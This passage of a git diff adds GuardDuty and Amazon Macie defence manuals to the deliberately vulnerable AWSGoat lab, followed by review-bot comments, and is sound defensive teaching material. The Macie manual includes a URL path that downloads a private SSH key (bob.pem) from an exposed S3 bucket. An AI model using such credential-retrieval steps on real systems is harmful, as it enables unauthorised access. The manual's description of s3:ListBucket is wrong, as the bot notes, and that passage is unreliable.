Here the action was to change bucket Policy and it is listed as "PutBucketPolicy". + +![](./images/Amazon-Guardduty/7.png) + +The finding also informs you that the listed S3 bucket has been publicly exposed to all the authenticated AWS users because an IAM entity has changed a bucket policy on that S3 bucket. + +To take the necessary action on the resource (S3 bucket), click on the "Resource ID" and it will navigate you to the resource. + +![](./images/Amazon-Guardduty/8.png) + +Here we want to check the bucket permissions so, click on the "Permissions" tab. + +![](./images/Amazon-Guardduty/9.png) + +Here, "s3:ListBucket" permission is the unintended access to this S3 Bucket and this may lead to the sensitive data exposure. The "s3:ListBucket" permission returns a list of all buckets owned by the authenticated sender of the request and we don't want our user to have this permission. Whereas, "s3:GetObject" permission is simply used to retrieves objects from Amazon S3 bucket. And we need "s3:GetObject" permission to run our web application. + +To edit the bucket permissions, click on the "Edit" button. + +![](./images/Amazon-Guardduty/10.png) + +Here remove the "s3:ListBucket" permission using editor and click on the "Save changes" button. + +![](./images/Amazon-Guardduty/11.png) + +You can see the Bucket policy got changed. + +![](./images/Amazon-Guardduty/12.png) + +Now, navigate back to the GuardDuty dashboard and click on the another finding available. + +You will notice that this finding is identical to the one discussed above, just the bucket name is different. + +![](./images/Amazon-Guardduty/13.png) + +![](./images/Amazon-Guardduty/14.png) + +To check the bucket policy click on the "Resource Id" and it will navigate you to the resource. + +![](./images/Amazon-Guardduty/15.png) + +Here, click on the "Permissions" tab. + +![](./images/Amazon-Guardduty/16.png) + +The bucket policy looks exactly what we wanted. 
So, we will not take any action or change anything here. + +![](./images/Amazon-Guardduty/17.png) + +Thus, GuardDuty generates the findings whenever it detects unexpected and potentially malicious activity in your AWS environment and allows us to take the necessary actions. + +# Inferences + +* GuardDuty is a threat detection service that continuously monitors your AWS Service accounts, workloads, and data stored in Amazon S3 for malicious activity. + +* When GuardDuty detects unexpected and potentially malicious activity in your AWS environment, it generates a finding. + +* Using the findings we can take the necessary actions. + +* This can defend us against the attack performed in [IAM Privilege Escalation](https://github.com/ine-labs/AWSGoat/blob/master/attack-manuals/module-1/07-IAM%20Privilege%20Escalation.md) when the attacker tries to list the bucket objects. + +# Further Readings + +* [What is AWS GuardDuty](https://docs.aws.amazon.com/guardduty/latest/ug/what-is-guardduty.html) + +* [IAM Security Best Practices](https://docs.aws.amazon.com/IAM/latest/UserGuide/best-practices.html) \ No newline at end of file diff --git a/defence-manuals/Amazon Macie.md b/defence-manuals/Amazon Macie.md new file mode 100644 index 00000000..fb5e5b4b --- /dev/null +++ b/defence-manuals/Amazon Macie.md 
@@ -0,0 +1,147 @@ +# Objective + +Find vulnerable objects in AWS S3 bucket using Amazon Macie. + +# Solution + +* Log in to [AWS account](https://aws.amazon.com/) where [AWS Goat Module:1](https://github.com/ine-labs/AWSGoat) infrastructure has been deployed + +* Now, search for **Amazon Macie** and head to it's page. + + ![](./images/Amazon-Macie/1.png) + + ![](./images/Amazon-Macie/2.png) + +* Click on **Get Started** and in the next page click on **Enable Macie**. + + ![](./images/Amazon-Macie/4.png) + + +## Finding Vulnerable objects in public S3 Bucket + + +* Now, in the **Get Started** section, click on **Create job** under **Analyze public buckets** + + ![](./images/Amazon-Macie/5.png) + +* Select the following buckets which are public and click on **Next**. + + ![](./images/Amazon-Macie/6.png) + +* In **Refine the scope** step, select **One-time job** for **Sensitive data discovery options** and click on **Next**. + + ![](./images/Amazon-Macie/7.png) + +* In **Select managed data identifiers**, choose **Include** option and select all the data types with **CREDENTIALS** as **Sensitive data catagory** and click on next. + + ![](./images/Amazon-Macie/8.png) + +* Click on **Next** in all the other screens and click on **Submit**. + + ![](./images/Amazon-Macie/10.png) + +* Now, wait for 7 to 12 minutes while Macie scans for vulnerable objects. + +* After the run has completed, click on **Show Results** to find out which object is vulnerable. + + ![](./images/Amazon-Macie/12.png) + +* Now, we can see that **.pem** files have public read access which is unneccesary and might give access to one of our ec2 instances. + + ![](./images/Amazon-Macie/14.png) + +## Fixing misconfigured permissions + +* Go to the application's home page, and click on **View page source** from the *right-click* menu. + + ![](./images/Amazon-Macie/15.png) + +* Now, click on the link displayed on page. 
+ + ![](./images/Amazon-Macie/16.png) + +* if we observe carefully, the vulnerable objects are present in dev bucket. Hence, replace **production** with **dev** and add the payload after url. Let's check if we can access the .pem file. + + ![](./images/Amazon-Macie/17.png) + + ![](./images/Amazon-Macie/18.png) + +* Your address would be similar to this: + ```html + https://dev-[bucket-url]/shared/files/.ssh/keys/bob.pem + ``` + +* We can see that the **bob.pem** file has been downloaded. Which means anyone on the internet can access it and can get access to ec2 instance. + +* Now, let's remove the public read access in the permissions tab of this file. + + ![](./images/Amazon-Macie/19.png) + +* Click on **Edit** and remove the **Public Read Access** permission. let's check if we can still download the file. + + ![](./images/Amazon-Macie/20.png) + +* We can still download the file even after removing **Public Read access**, this might be due to misconfigured bucket permissions. Let's fix them. + +* Now, head to **bucket permissions**. We can see that the bucket has excessive permissions. + + ![](./images/Amazon-Macie/21.png) + +* S3 bucket should only be accessible by the resources which need it. Now, go to IAM roles and search for **AWS_GOAT_ROLE**. Copy the role's *ARN*. + + ![](./images/Amazon-Macie/22.png) + + ![](./images/Amazon-Macie/23.png) + +* Go back to S3 bucket's permissions tab. and add the copied ARN to the **principal** and also remove **ListBucket** permission. Your policy statement should look like this: + + ```json + { + "Version": "2012-10-17", + "Statement": [ + { + "Sid": "", + "Effect": "Allow", + "Principal": { + "AWS": "arn:aws:iam::[ACCOUNT-ID]:role/AWS_GOAT_ROLE" + }, + "Action": "s3:GetObject", + "Resource": [ + "arn:aws:s3:::dev-blog-awsgoat-bucket-[ACCOUNT-ID]/*", + "arn:aws:s3:::dev-blog-awsgoat-bucket-[ACCOUNT-ID]" + ] + } + ] + } + ``` + + ![](./images/Amazon-Macie/24.png) + +* Now, let's try to download the pem file. 
We can see that the access is denied! + + ![](./images/Amazon-Macie/25.png) + +* Don't forget to remove **Public Read Access** to all the other vulnerable files. + +* Voila, we can now say that we have succesfully secured our s3 bucket as well as the infrastructure. + +# Inferences + +* Amazon Macie helps identify vulnerable objects such as Credentials, Sensitive information etc., in our s3 buckets. + +* Even though our bucket has correct permissions, we need to make sure that the objects in the bucket do not have **Public Read Access**. + +* We can run **Amazon Macie** jobs weekly/monthly to detect vulnerable objects which are exploitable. This is suited for those whose infrastructure changes constantly. + +* This can defend us against the attack performed in [IAM Privilege Escalation Manual](https://github.com/ine-labs/AWSGoat/blob/master/attack-manuals/module-1/07-IAM%20Privilege%20Escalation.md). where the hacker tries to download the .pem file and gets into EC2 Instance. + + +# Further Readings + +* [What is Amazon Macie?](https://docs.aws.amazon.com/macie/latest/user/what-is-macie.html) + +* [Top 10 security best practices for securing data in Amazon S3](https://aws.amazon.com/blogs/security/top-10-security-best-practices-for-securing-data-in-amazon-s3) + +* [What is AWS Config?](https://docs.aws.amazon.com/config/latest/developerguide/WhatIsConfig.html) + +* [IAM Security Best Practices](https://docs.aws.amazon.com/IAM/latest/UserGuide/best-practices.html) \ No newline at end of file diff --git a/defence-manuals/images/AWS-Config/1.png b/defence-manuals/images/AWS-Config/1.png new file mode 100644 index 00000000..6e970955 Binary files /dev/null and b/defence-manuals/images/AWS-Config/1.png differ diff --git a/defence-manuals/images/AWS-Config/10.png b/defence-manuals/images/AWS-Config/10.png new file mode 100644 index 00000000..bf42ea37 Binary files /dev/null and b/defence-manuals/images/AWS-Config/10.png differ 
diff --git a/defence-manuals/images/AWS-Config/11.png b/defence-manuals/images/AWS-Config/11.png new file mode 100644 index 00000000..992df75d Binary files /dev/null and b/defence-manuals/images/AWS-Config/11.png differ diff --git a/defence-manuals/images/AWS-Config/12.png b/defence-manuals/images/AWS-Config/12.png new file mode 100644 index 00000000..898fffdb Binary files /dev/null and b/defence-manuals/images/AWS-Config/12.png differ diff --git a/defence-manuals/images/AWS-Config/13.png b/defence-manuals/images/AWS-Config/13.png new file mode 100644 index 00000000..2c39e8ba Binary files /dev/null and b/defence-manuals/images/AWS-Config/13.png differ diff --git a/defence-manuals/images/AWS-Config/14.png b/defence-manuals/images/AWS-Config/14.png new file mode 100644 index 00000000..05b31dd2 Binary files /dev/null and b/defence-manuals/images/AWS-Config/14.png differ diff --git a/defence-manuals/images/AWS-Config/15.png b/defence-manuals/images/AWS-Config/15.png new file mode 100644 index 00000000..be77ee89 Binary files /dev/null and b/defence-manuals/images/AWS-Config/15.png differ diff --git a/defence-manuals/images/AWS-Config/16.png b/defence-manuals/images/AWS-Config/16.png new file mode 100644 index 00000000..88b0e50c Binary files /dev/null and b/defence-manuals/images/AWS-Config/16.png differ diff --git a/defence-manuals/images/AWS-Config/17.png b/defence-manuals/images/AWS-Config/17.png new file mode 100644 index 00000000..15ebaa37 Binary files /dev/null and b/defence-manuals/images/AWS-Config/17.png differ diff --git a/defence-manuals/images/AWS-Config/2.png b/defence-manuals/images/AWS-Config/2.png new file mode 100644 index 00000000..543c8f64 Binary files /dev/null and b/defence-manuals/images/AWS-Config/2.png differ diff --git a/defence-manuals/images/AWS-Config/3.png b/defence-manuals/images/AWS-Config/3.png new file mode 100644 index 00000000..790b6fc8 Binary files /dev/null and b/defence-manuals/images/AWS-Config/3.png differ 
diff --git a/defence-manuals/images/AWS-Config/4.png b/defence-manuals/images/AWS-Config/4.png new file mode 100644 index 00000000..fb126999 Binary files /dev/null and b/defence-manuals/images/AWS-Config/4.png differ diff --git a/defence-manuals/images/AWS-Config/5.png b/defence-manuals/images/AWS-Config/5.png new file mode 100644 index 00000000..19bedfbf Binary files /dev/null and b/defence-manuals/images/AWS-Config/5.png differ diff --git a/defence-manuals/images/AWS-Config/6.png b/defence-manuals/images/AWS-Config/6.png new file mode 100644 index 00000000..a94d1c0a Binary files /dev/null and b/defence-manuals/images/AWS-Config/6.png differ diff --git a/defence-manuals/images/AWS-Config/7.png b/defence-manuals/images/AWS-Config/7.png new file mode 100644 index 00000000..af0c02cc Binary files /dev/null and b/defence-manuals/images/AWS-Config/7.png differ diff --git a/defence-manuals/images/AWS-Config/8.png b/defence-manuals/images/AWS-Config/8.png new file mode 100644 index 00000000..5418d92f Binary files /dev/null and b/defence-manuals/images/AWS-Config/8.png differ diff --git a/defence-manuals/images/AWS-Config/9.png b/defence-manuals/images/AWS-Config/9.png new file mode 100644 index 00000000..7a33c609 Binary files /dev/null and b/defence-manuals/images/AWS-Config/9.png differ diff --git a/defence-manuals/images/AWS-IAM-Access-Analyzer/1.png b/defence-manuals/images/AWS-IAM-Access-Analyzer/1.png new file mode 100644 index 00000000..4295fb7d Binary files /dev/null and b/defence-manuals/images/AWS-IAM-Access-Analyzer/1.png differ diff --git a/defence-manuals/images/AWS-IAM-Access-Analyzer/10.png b/defence-manuals/images/AWS-IAM-Access-Analyzer/10.png new file mode 100644 index 00000000..87fb4198 Binary files /dev/null and b/defence-manuals/images/AWS-IAM-Access-Analyzer/10.png differ 
diff --git a/defence-manuals/images/AWS-IAM-Access-Analyzer/11.png b/defence-manuals/images/AWS-IAM-Access-Analyzer/11.png new file mode 100644 index 00000000..07d53ca1 Binary files /dev/null and b/defence-manuals/images/AWS-IAM-Access-Analyzer/11.png differ diff --git a/defence-manuals/images/AWS-IAM-Access-Analyzer/12.png b/defence-manuals/images/AWS-IAM-Access-Analyzer/12.png new file mode 100644 index 00000000..21ea1825 Binary files /dev/null and b/defence-manuals/images/AWS-IAM-Access-Analyzer/12.png differ diff --git a/defence-manuals/images/AWS-IAM-Access-Analyzer/13.png b/defence-manuals/images/AWS-IAM-Access-Analyzer/13.png new file mode 100644 index 00000000..22fbaff3 Binary files /dev/null and b/defence-manuals/images/AWS-IAM-Access-Analyzer/13.png differ diff --git a/defence-manuals/images/AWS-IAM-Access-Analyzer/14.png b/defence-manuals/images/AWS-IAM-Access-Analyzer/14.png new file mode 100644 index 00000000..969dd736 Binary files /dev/null and b/defence-manuals/images/AWS-IAM-Access-Analyzer/14.png differ diff --git a/defence-manuals/images/AWS-IAM-Access-Analyzer/15.png b/defence-manuals/images/AWS-IAM-Access-Analyzer/15.png new file mode 100644 index 00000000..70dba393 Binary files /dev/null and b/defence-manuals/images/AWS-IAM-Access-Analyzer/15.png differ diff --git a/defence-manuals/images/AWS-IAM-Access-Analyzer/16.png b/defence-manuals/images/AWS-IAM-Access-Analyzer/16.png new file mode 100644 index 00000000..a5ba0ad2 Binary files /dev/null and b/defence-manuals/images/AWS-IAM-Access-Analyzer/16.png differ diff --git a/defence-manuals/images/AWS-IAM-Access-Analyzer/17.png b/defence-manuals/images/AWS-IAM-Access-Analyzer/17.png new file mode 100644 index 00000000..1337ee67 Binary files /dev/null and b/defence-manuals/images/AWS-IAM-Access-Analyzer/17.png differ 
diff --git a/defence-manuals/images/AWS-IAM-Access-Analyzer/18.png b/defence-manuals/images/AWS-IAM-Access-Analyzer/18.png new file mode 100644 index 00000000..65f10dd7 Binary files /dev/null and b/defence-manuals/images/AWS-IAM-Access-Analyzer/18.png differ diff --git a/defence-manuals/images/AWS-IAM-Access-Analyzer/2.png b/defence-manuals/images/AWS-IAM-Access-Analyzer/2.png new file mode 100644 index 00000000..32562a4b Binary files /dev/null and b/defence-manuals/images/AWS-IAM-Access-Analyzer/2.png differ diff --git a/defence-manuals/images/AWS-IAM-Access-Analyzer/3.png b/defence-manuals/images/AWS-IAM-Access-Analyzer/3.png new file mode 100644 index 00000000..c903ae11 Binary files /dev/null and b/defence-manuals/images/AWS-IAM-Access-Analyzer/3.png differ diff --git a/defence-manuals/images/AWS-IAM-Access-Analyzer/4.png b/defence-manuals/images/AWS-IAM-Access-Analyzer/4.png new file mode 100644 index 00000000..f4225690 Binary files /dev/null and b/defence-manuals/images/AWS-IAM-Access-Analyzer/4.png differ diff --git a/defence-manuals/images/AWS-IAM-Access-Analyzer/5.png b/defence-manuals/images/AWS-IAM-Access-Analyzer/5.png new file mode 100644 index 00000000..107d2e3e Binary files /dev/null and b/defence-manuals/images/AWS-IAM-Access-Analyzer/5.png differ diff --git a/defence-manuals/images/AWS-IAM-Access-Analyzer/6.png b/defence-manuals/images/AWS-IAM-Access-Analyzer/6.png new file mode 100644 index 00000000..14294a41 Binary files /dev/null and b/defence-manuals/images/AWS-IAM-Access-Analyzer/6.png differ diff --git a/defence-manuals/images/AWS-IAM-Access-Analyzer/7.png b/defence-manuals/images/AWS-IAM-Access-Analyzer/7.png new file mode 100644 index 00000000..41ac546b Binary files /dev/null and b/defence-manuals/images/AWS-IAM-Access-Analyzer/7.png differ 
diff --git a/defence-manuals/images/AWS-IAM-Access-Analyzer/8.png b/defence-manuals/images/AWS-IAM-Access-Analyzer/8.png new file mode 100644 index 00000000..cb4b8839 Binary files /dev/null and b/defence-manuals/images/AWS-IAM-Access-Analyzer/8.png differ diff --git a/defence-manuals/images/AWS-IAM-Access-Analyzer/9.png b/defence-manuals/images/AWS-IAM-Access-Analyzer/9.png new file mode 100644 index 00000000..a1140283 Binary files /dev/null and b/defence-manuals/images/AWS-IAM-Access-Analyzer/9.png differ diff --git a/defence-manuals/images/Amazon-Guardduty/1.png b/defence-manuals/images/Amazon-Guardduty/1.png new file mode 100644 index 00000000..7002dddb Binary files /dev/null and b/defence-manuals/images/Amazon-Guardduty/1.png differ diff --git a/defence-manuals/images/Amazon-Guardduty/10.png b/defence-manuals/images/Amazon-Guardduty/10.png new file mode 100644 index 00000000..c2675d29 Binary files /dev/null and b/defence-manuals/images/Amazon-Guardduty/10.png differ diff --git a/defence-manuals/images/Amazon-Guardduty/11.png b/defence-manuals/images/Amazon-Guardduty/11.png new file mode 100644 index 00000000..7a0d4cd3 Binary files /dev/null and b/defence-manuals/images/Amazon-Guardduty/11.png differ diff --git a/defence-manuals/images/Amazon-Guardduty/12.png b/defence-manuals/images/Amazon-Guardduty/12.png new file mode 100644 index 00000000..0c71c9b7 Binary files /dev/null and b/defence-manuals/images/Amazon-Guardduty/12.png differ diff --git a/defence-manuals/images/Amazon-Guardduty/13.png b/defence-manuals/images/Amazon-Guardduty/13.png new file mode 100644 index 00000000..5c905daa Binary files /dev/null and b/defence-manuals/images/Amazon-Guardduty/13.png differ diff --git a/defence-manuals/images/Amazon-Guardduty/14.png b/defence-manuals/images/Amazon-Guardduty/14.png new file mode 100644 index 00000000..385ec25c Binary files /dev/null and b/defence-manuals/images/Amazon-Guardduty/14.png differ 
diff --git a/defence-manuals/images/Amazon-Guardduty/15.png b/defence-manuals/images/Amazon-Guardduty/15.png new file mode 100644 index 00000000..ccba1eb8 Binary files /dev/null and b/defence-manuals/images/Amazon-Guardduty/15.png differ diff --git a/defence-manuals/images/Amazon-Guardduty/16.png b/defence-manuals/images/Amazon-Guardduty/16.png new file mode 100644 index 00000000..c9744771 Binary files /dev/null and b/defence-manuals/images/Amazon-Guardduty/16.png differ diff --git a/defence-manuals/images/Amazon-Guardduty/17.png b/defence-manuals/images/Amazon-Guardduty/17.png new file mode 100644 index 00000000..dbd2119c Binary files /dev/null and b/defence-manuals/images/Amazon-Guardduty/17.png differ diff --git a/defence-manuals/images/Amazon-Guardduty/2.png b/defence-manuals/images/Amazon-Guardduty/2.png new file mode 100644 index 00000000..b08defa8 Binary files /dev/null and b/defence-manuals/images/Amazon-Guardduty/2.png differ diff --git a/defence-manuals/images/Amazon-Guardduty/3.png b/defence-manuals/images/Amazon-Guardduty/3.png new file mode 100644 index 00000000..1a7ef801 Binary files /dev/null and b/defence-manuals/images/Amazon-Guardduty/3.png differ diff --git a/defence-manuals/images/Amazon-Guardduty/4.png b/defence-manuals/images/Amazon-Guardduty/4.png new file mode 100644 index 00000000..a9910a38 Binary files /dev/null and b/defence-manuals/images/Amazon-Guardduty/4.png differ diff --git a/defence-manuals/images/Amazon-Guardduty/5.png b/defence-manuals/images/Amazon-Guardduty/5.png new file mode 100644 index 00000000..6a912002 Binary files /dev/null and b/defence-manuals/images/Amazon-Guardduty/5.png differ diff --git a/defence-manuals/images/Amazon-Guardduty/6.PNG b/defence-manuals/images/Amazon-Guardduty/6.PNG new file mode 100644 index 00000000..e1d00fb7 Binary files /dev/null and b/defence-manuals/images/Amazon-Guardduty/6.PNG differ 
diff --git a/defence-manuals/images/Amazon-Guardduty/7.png b/defence-manuals/images/Amazon-Guardduty/7.png new file mode 100644 index 00000000..6526f497 Binary files /dev/null and b/defence-manuals/images/Amazon-Guardduty/7.png differ diff --git a/defence-manuals/images/Amazon-Guardduty/8.png b/defence-manuals/images/Amazon-Guardduty/8.png new file mode 100644 index 00000000..ffaf5319 Binary files /dev/null and b/defence-manuals/images/Amazon-Guardduty/8.png differ diff --git a/defence-manuals/images/Amazon-Guardduty/9.png b/defence-manuals/images/Amazon-Guardduty/9.png new file mode 100644 index 00000000..1fbf2f7f Binary files /dev/null and b/defence-manuals/images/Amazon-Guardduty/9.png differ diff --git a/defence-manuals/images/Amazon-Macie/1.png b/defence-manuals/images/Amazon-Macie/1.png new file mode 100644 index 00000000..2cec820d Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/1.png differ diff --git a/defence-manuals/images/Amazon-Macie/10.png b/defence-manuals/images/Amazon-Macie/10.png new file mode 100644 index 00000000..0be30966 Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/10.png differ diff --git a/defence-manuals/images/Amazon-Macie/11.png b/defence-manuals/images/Amazon-Macie/11.png new file mode 100644 index 00000000..2ed4ec56 Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/11.png differ diff --git a/defence-manuals/images/Amazon-Macie/12.png b/defence-manuals/images/Amazon-Macie/12.png new file mode 100644 index 00000000..3900344c Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/12.png differ diff --git a/defence-manuals/images/Amazon-Macie/13.png b/defence-manuals/images/Amazon-Macie/13.png new file mode 100644 index 00000000..d004fef4 Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/13.png differ 
diff --git a/defence-manuals/images/Amazon-Macie/14.png b/defence-manuals/images/Amazon-Macie/14.png new file mode 100644 index 00000000..7c9898cf Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/14.png differ diff --git a/defence-manuals/images/Amazon-Macie/15.png b/defence-manuals/images/Amazon-Macie/15.png new file mode 100644 index 00000000..4553be7b Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/15.png differ diff --git a/defence-manuals/images/Amazon-Macie/16.png b/defence-manuals/images/Amazon-Macie/16.png new file mode 100644 index 00000000..e490d7fd Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/16.png differ diff --git a/defence-manuals/images/Amazon-Macie/17.png b/defence-manuals/images/Amazon-Macie/17.png new file mode 100644 index 00000000..4218e874 Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/17.png differ diff --git a/defence-manuals/images/Amazon-Macie/18.png b/defence-manuals/images/Amazon-Macie/18.png new file mode 100644 index 00000000..727af4e4 Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/18.png differ diff --git a/defence-manuals/images/Amazon-Macie/19.png b/defence-manuals/images/Amazon-Macie/19.png new file mode 100644 index 00000000..5871319c Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/19.png differ diff --git a/defence-manuals/images/Amazon-Macie/2.png b/defence-manuals/images/Amazon-Macie/2.png new file mode 100644 index 00000000..ab1ffe7b Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/2.png differ diff --git a/defence-manuals/images/Amazon-Macie/20.png b/defence-manuals/images/Amazon-Macie/20.png new file mode 100644 index 00000000..1b8b2dd8 Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/20.png differ 
diff --git a/defence-manuals/images/Amazon-Macie/21.png b/defence-manuals/images/Amazon-Macie/21.png new file mode 100644 index 00000000..d518c579 Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/21.png differ diff --git a/defence-manuals/images/Amazon-Macie/22.png b/defence-manuals/images/Amazon-Macie/22.png new file mode 100644 index 00000000..e7c4ff70 Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/22.png differ diff --git a/defence-manuals/images/Amazon-Macie/23.png b/defence-manuals/images/Amazon-Macie/23.png new file mode 100644 index 00000000..807bd3bf Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/23.png differ diff --git a/defence-manuals/images/Amazon-Macie/24.png b/defence-manuals/images/Amazon-Macie/24.png new file mode 100644 index 00000000..ce79833e Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/24.png differ diff --git a/defence-manuals/images/Amazon-Macie/25.png b/defence-manuals/images/Amazon-Macie/25.png new file mode 100644 index 00000000..ed3445e0 Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/25.png differ diff --git a/defence-manuals/images/Amazon-Macie/3.png b/defence-manuals/images/Amazon-Macie/3.png new file mode 100644 index 00000000..325af484 Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/3.png differ diff --git a/defence-manuals/images/Amazon-Macie/4.png b/defence-manuals/images/Amazon-Macie/4.png new file mode 100644 index 00000000..6c37623d Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/4.png differ diff --git a/defence-manuals/images/Amazon-Macie/5.png b/defence-manuals/images/Amazon-Macie/5.png new file mode 100644 index 00000000..31a92bab Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/5.png differ 
diff --git a/defence-manuals/images/Amazon-Macie/6.png b/defence-manuals/images/Amazon-Macie/6.png new file mode 100644 index 00000000..c805c57b Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/6.png differ diff --git a/defence-manuals/images/Amazon-Macie/7.png b/defence-manuals/images/Amazon-Macie/7.png new file mode 100644 index 00000000..1d25e343 Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/7.png differ diff --git a/defence-manuals/images/Amazon-Macie/8.png b/defence-manuals/images/Amazon-Macie/8.png new file mode 100644 index 00000000..acd9df47 Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/8.png differ diff --git a/defence-manuals/images/Amazon-Macie/9.png b/defence-manuals/images/Amazon-Macie/9.png new file mode 100644 index 00000000..30b855cf Binary files /dev/null and b/defence-manuals/images/Amazon-Macie/9.png differ diff --git a/modules/module-2/src/src/images/.DS_Store b/modules/module-2/src/src/images/.DS_Store deleted file mode 100644 index 50c49d7c..00000000 Binary files a/modules/module-2/src/src/images/.DS_Store and /dev/null differ
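Review bot: The paragraph ahead of `./images/AWS-IAM-Access-Analyzer/6.png` describes `s3:ListBucket` as returning "a list of all buckets owned by the authenticated sender of the request", which is the behaviour of `s3:ListAllMyBuckets`. `s3:ListBucket` allows listing the objects inside a single bucket, which is also what the Inferences bullet means by "list the bucket objects". Please reword the sentence and fix "used to retrieves" in the one that follows. The same paragraph is copied into `defence-manuals/Amazon Guarduty.md` ahead of `./images/Amazon-Guardduty/10.png` and needs the same correction.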
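Review bot: The GuardDuty manual is added as `defence-manuals/Amazon Guarduty.md`, which drops a "d" compared with the service name and with its own image directory `images/Amazon-Guardduty/`; rename it to `Amazon GuardDuty.md` before anything links to it. In the same manual the severity screenshot is referenced as `./images/Amazon-Guardduty/6.png`, but the file is committed as `6.PNG`, so the image will not resolve on a case-sensitive host; rename the file or the reference so the case matches. The sentence 'This bucket is having "High" severity level' should also attribute the severity to the finding rather than to the bucket.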
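Review bot: In the bucket policy shown in `defence-manuals/Amazon Macie.md`, the statement allows only `s3:GetObject` but still lists the bare bucket ARN `arn:aws:s3:::dev-blog-awsgoat-bucket-[ACCOUNT-ID]` under `Resource`. `s3:GetObject` is an object-level action, so once `ListBucket` is removed that entry matches nothing and should be dropped, leaving only the `/*` ARN. The manual also stops at restricting access to `bob.pem`; since the walkthrough shows the key was downloadable by anyone, add a step that treats the key pair as exposed and replaces it. Minor: "it's page", "catagory", "unneccesary" and "succesfully" need correcting, and the fence around the example URL is tagged `html`.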
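Review bot: `defence-manuals/images/Amazon-Macie/3.png`, `9.png`, `11.png` and `13.png` are added, but `Amazon Macie.md` never references them (it uses 1, 2, 4 to 8, 10, 12 and 14 to 25). Either reference them at the matching steps or drop them from the commit so the repository does not carry unused screenshots.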